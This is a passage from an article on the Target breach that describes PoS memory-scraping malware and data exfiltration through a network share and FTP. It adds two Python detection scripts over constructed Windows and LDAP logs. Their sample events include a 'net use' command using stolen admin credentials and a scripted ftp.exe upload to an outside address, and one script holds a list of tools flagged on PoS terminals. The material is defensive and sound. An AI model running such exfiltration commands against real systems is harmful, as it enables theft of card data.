Step 9: Install Malware. Steal 40 Million Credit Cards
The PoS systems were probably not the attackers' initial target, Be'ery says. Only when they failed to find credit card data on the servers they had accessed did they turn to the PoS machines as a fallback. Using the reconnaissance gathered in step four and the remote execution capability gained in step seven, the attackers installed the Kaptoxa malware (pronounced "Kar-toe-sha") on the PoS machines. The malware scanned the memory of infected machines for card data and wrote any card numbers it found to a local file. Memory scraping works because card data sits unencrypted in the PoS process's memory for a moment while it is being processed, even where it is encrypted on disk and on the wire.
This step, Be'ery notes, is the only one in which the attackers seem to have used custom-written malware rather than common IT tools.
"Having antivirus would not help you in this case," he says. "When the stakes are so high, with profit in the tens of millions of dollars, they don't care about the cost of creating tailor-made tools."
Step 10: Send Stolen Data via Network Share
Once the malware had harvested card data, it mounted a file share on another internal, FTP-enabled machine, using a built-in Windows command and the stolen Domain Admin credentials, and periodically copied its local dump file to that share.
Again, Be'ery notes, these connections would have been authenticated and authorized against Active Directory, so AD had a record of the activity.
Step 11: Send Stolen Data via FTP
Finally, once the data had arrived on the FTP-enabled machine, a script used the built-in Windows FTP client (ftp.exe) to send the file to an FTP account the attackers controlled. FTP carries its credentials and payload in cleartext, and it is a protocol a single-purpose internal server has no reason to originate, so the transfer itself was as visible as the share traffic before it.
"The initial penetration point is not the story, because eventually you have to assume you're going to get breached," Be'ery says. "You cannot assume otherwise. You have to be prepared and have an incident response plan for what to do when you are breached. The real problem arises when malware is able to enable an attacker to penetrate deeper into the network."
"If you have the right visibility, that activity really stands out," he adds.
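The staging path in steps 10 and 11 leaves three distinct traces in ordinary Windows Security logs. The following is an added example, not code from the article or from Be'ery or Aorato: detection logic over constructed sample events (IDs 4624 logon, 4688 process creation, 5140 share access) that flags a Domain Admin account used from a PoS terminal or against a non-admin host, built-in tools launched on a PoS host, and a share being hit at a machine-regular cadence. The asset inventory, host and account names, addresses and timestamps are all made up; net.exe is assumed to be the "Windows command" the article refers to.

```python
# Added example (not from the article, Be'ery or Aorato). Event dicts are a
# simplified stand-in for parsed Security log records; all names are constructed.
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Assumed asset inventory (constructed).
DOMAIN_ADMINS = {"CORP\\svc-backup"}
POS_HOSTS = {"POS-0117", "POS-0233"}
DA_EXPECTED_HOSTS = {"DC01", "DC02", "ADMIN-JUMP"}   # where DA logons are normal
# Built-in tools a single-purpose PoS terminal should never launch. net.exe is
# assumed to be the "Windows command" the article mentions; ftp.exe is the
# built-in FTP client it names.
TOOLS_NOT_EXPECTED_ON_POS = {"net.exe", "net1.exe", "ftp.exe"}


def _t(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def _share(ts, src):   # 5140: network share object accessed
    return {"ts": ts, "id": 5140, "host": "SRV-FTP1", "user": "CORP\\svc-backup",
            "share": r"\\*\staging", "src_host": src}


EVENTS = [
    # Attack path: DA account used from a PoS terminal to reach the staging box
    {"ts": "2013-12-02T02:00:05", "id": 4624, "host": "SRV-FTP1",
     "user": "CORP\\svc-backup", "logon_type": 3, "src_host": "POS-0117"},
    {"ts": "2013-12-02T02:00:06", "id": 4688, "host": "POS-0117",
     "user": "CORP\\svc-backup", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use S: \\SRV-FTP1\staging /user:CORP\svc-backup ******"},
    _share("2013-12-02T02:00:07", "POS-0117"),   # hourly copy loop
    _share("2013-12-02T03:00:08", "POS-0117"),
    _share("2013-12-02T04:00:06", "POS-0117"),
    _share("2013-12-02T05:00:09", "POS-0117"),
    {"ts": "2013-12-02T05:10:00", "id": 4688, "host": "SRV-FTP1",
     "user": "CORP\\svc-backup", "image": r"C:\Windows\System32\ftp.exe",
     "cmdline": r"ftp -s:C:\Windows\Temp\cmds.txt 203.0.113.10"},
    # Benign noise: DA logon to a domain controller, the register app on a PoS host
    {"ts": "2013-12-02T09:00:00", "id": 4624, "host": "DC01",
     "user": "CORP\\svc-backup", "logon_type": 3, "src_host": "ADMIN-JUMP"},
    {"ts": "2013-12-02T09:30:00", "id": 4688, "host": "POS-0233",
     "user": "CORP\\pos-operator", "image": r"C:\PoS\register.exe",
     "cmdline": "register.exe"},
]


def privileged_logons_outside_scope(events):
    """Domain Admin network logons (type 3) to hosts where DA activity is not
    expected, or originating from a PoS terminal. Either alone is anomalous."""
    hits = []
    for e in events:
        if e["id"] != 4624 or e["user"] not in DOMAIN_ADMINS or e["logon_type"] != 3:
            continue
        if e["host"] not in DA_EXPECTED_HOSTS or e["src_host"] in POS_HOSTS:
            hits.append((e["ts"], e["user"], e["src_host"], e["host"]))
    return hits


def builtin_tools_on_pos(events):
    """net.exe/ftp.exe started on a PoS host, plus ftp.exe in scripted mode
    (-s:) anywhere, which is how a batch exfil script drives the client."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        exe = PureWindowsPath(e["image"]).name.lower()
        scripted_ftp = exe == "ftp.exe" and "-s:" in e["cmdline"].lower()
        if (e["host"] in POS_HOSTS and exe in TOOLS_NOT_EXPECTED_ON_POS) or scripted_ftp:
            hits.append((e["ts"], e["host"], exe, e["cmdline"]))
    return hits


def periodic_share_access(events, min_events=4, jitter=timedelta(minutes=5)):
    """Same source hitting the same share at near-constant intervals is a copy
    loop, not a person. Returns (src_host, share, period_in_minutes)."""
    by_key = defaultdict(list)
    for e in events:
        if e["id"] == 5140:
            by_key[(e["src_host"], e["share"])].append(_t(e["ts"]))
    findings = []
    for (src, share), times in by_key.items():
        times.sort()
        if len(times) < min_events:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= jitter:
            period = round(sum(gaps, timedelta()) / len(gaps) / timedelta(minutes=1))
            findings.append((src, share, period))
    return findings


if __name__ == "__main__":
    for f in (privileged_logons_outside_scope, builtin_tools_on_pos, periodic_share_access):
        print(f.__name__, f(EVENTS))
```

Each rule is deliberately narrow and independent: the DA-from-PoS logon would fire even if the copy loop were jittered, and the cadence rule would fire even if a non-privileged account had been used. The inventory sets are the part that needs real data; without knowing which hosts are PoS terminals and where admin accounts belong, none of this is possible, which is the visibility Be'ery is talking about.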
How to Protect Your Organization
Be'ery recommends that organizations take the following steps to protect themselves:
- Harden access controls. Monitor and profile access patterns to systems so that abnormal and rogue access stands out. Where possible, require multi-factor authentication for sensitive systems to reduce the risk from stolen credentials. Segment networks, restrict which protocols are allowed, and remove excessive user privileges.
- Monitor user lists for newly added accounts, especially privileged ones.
- Monitor for signs of reconnaissance and information gathering. Pay special attention to excessive or abnormal LDAP queries.
- For sensitive, single-purpose servers, consider application whitelisting so that only approved programs can run.
- Don't rely on anti-malware solutions as a primary mitigation measure since attackers mostly leverage legitimate IT tools.
- Place security and monitoring controls around Active Directory as it is involved in nearly all stages of the attack.
- Participate in Information Sharing and Analysis Center (ISAC) and Cyber Intelligence Sharing Center (CISC) groups to gain valuable intelligence on attackers' Tactics, Techniques and Procedures (TTPs).
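Two of the monitoring recommendations above, new privileged users and abnormal LDAP queries, can be expressed as detection logic against domain controller logs. The following is an added example, not code from the article or from Be'ery or Aorato. It uses the real Windows Security event IDs 4720 (user account created) and 4728/4732/4756 (member added to a global/local/universal security group) for the first check; for the second it assumes some per-query LDAP logging source on or in front of the domain controllers, whose record format here, like every name, address and baseline figure, is constructed.

```python
# Added example (not from the article, Be'ery or Aorato). All events, names,
# addresses and baseline values are constructed.
import re
from collections import Counter
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global/local/universal group


def _t(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


AD_EVENTS = [   # constructed Security log events from a domain controller
    {"ts": "2013-11-27T22:14:00", "id": 4720, "actor": "CORP\\svc-backup", "target": "CORP\\svc-sync"},
    {"ts": "2013-11-27T22:14:30", "id": 4728, "actor": "CORP\\svc-backup",
     "group": "Domain Admins", "member": "CORP\\svc-sync"},
    {"ts": "2013-11-28T09:05:00", "id": 4728, "actor": "CORP\\helpdesk1",
     "group": "Print Operators", "member": "CORP\\jdoe"},
    {"ts": "2013-11-28T10:00:00", "id": 4732, "actor": "CORP\\it-admin",
     "group": "Administrators", "member": "CORP\\jdoe"},
]


def privileged_group_additions(events, window=timedelta(hours=1)):
    """Every addition to a privileged group, marking the create-then-elevate
    pattern: the member's account was created by the same actor within `window`."""
    created = {e["target"]: (e["actor"], _t(e["ts"])) for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] not in GROUP_ADD_EVENTS or e["group"] not in PRIVILEGED_GROUPS:
            continue
        creator, when = created.get(e["member"], (None, None))
        fresh = creator == e["actor"] and _t(e["ts"]) - when <= window
        hits.append({"ts": e["ts"], "actor": e["actor"], "member": e["member"],
                     "group": e["group"], "new_account_by_same_actor": fresh})
    return hits


# A subtree search from the domain root for a whole object class, with nothing
# narrowing it down, is what enumeration looks like; a logon-time lookup of one
# account by sAMAccountName is not.
NARROWING_ATTRS = ("samaccountname=", "cn=", "distinguishedname=", "objectsid=",
                   "userprincipalname=", "objectguid=", "dnshostname=")
ENUM_CLASS = re.compile(r"object(?:category|class)=(?:person|user|computer|group)", re.I)


def _q(ts, account, client, flt):   # constructed LDAP search record
    return {"ts": ts, "account": account, "client": client,
            "base": "DC=corp,DC=local", "scope": "subtree", "filter": flt}


LDAP_LOG = [
    _q("2013-11-28T11:03:00", "CORP\\jdoe", "10.10.7.8",
       "(&(objectClass=user)(sAMAccountName=jdoe))"),            # normal lookup
    _q("2013-11-28T11:05:00", "CORP\\svc-sync", "10.10.5.23", "(objectCategory=computer)"),
    _q("2013-11-28T11:05:01", "CORP\\svc-sync", "10.10.5.23", "(&(objectCategory=group)(adminCount=1))"),
]
# 40 paged user enumerations from the same account within the same hour
LDAP_LOG += [_q(f"2013-11-28T11:{6 + i // 10:02d}:{(i % 10) * 6:02d}", "CORP\\svc-sync",
                "10.10.5.23", "(&(objectCategory=person)(objectClass=user))") for i in range(40)]

# Constructed baseline: median LDAP searches per hour per account over the prior month
BASELINE_PER_HOUR = {"CORP\\svc-sync": 2, "CORP\\jdoe": 5}


def is_broad_enumeration(q):
    f = q["filter"].lower()
    return (q["scope"] == "subtree" and q["base"].upper().startswith("DC=")
            and ENUM_CLASS.search(f) is not None
            and not any(a in f for a in NARROWING_ATTRS))


def ldap_anomalies(log, baseline, factor=5, min_count=20, broad_min=3):
    """Per (account, hour): flag search volume above `factor` x baseline (and at
    least `min_count`), and `broad_min` or more domain-wide enumerations."""
    total, broad = Counter(), Counter()
    for q in log:
        key = (q["account"], q["ts"][:13])          # hour bucket: YYYY-MM-DDTHH
        total[key] += 1
        broad[key] += is_broad_enumeration(q)
    findings = []
    for (account, hour), n in sorted(total.items()):
        reasons = []
        if n >= min_count and n > factor * baseline.get(account, 0):
            reasons.append("volume")
        if broad[(account, hour)] >= broad_min:
            reasons.append("broad_enumeration")
        if reasons:
            findings.append({"account": account, "hour": hour, "count": n,
                             "baseline": baseline.get(account, 0),
                             "broad_enumerations": broad[(account, hour)],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(privileged_group_additions(AD_EVENTS))
    print(ldap_anomalies(LDAP_LOG, BASELINE_PER_HOUR))
```

The group-membership check needs no baseline at all: additions to Domain Admins are rare enough in any organization that every one should be reviewed, and a new account elevated by the same actor minutes after creation is the single highest-value alert in this list. The LDAP check does need a per-account baseline, since service accounts and management tools legitimately query at very different rates; the filter heuristic is there so that a low-volume but domain-wide enumeration is not lost in the noise.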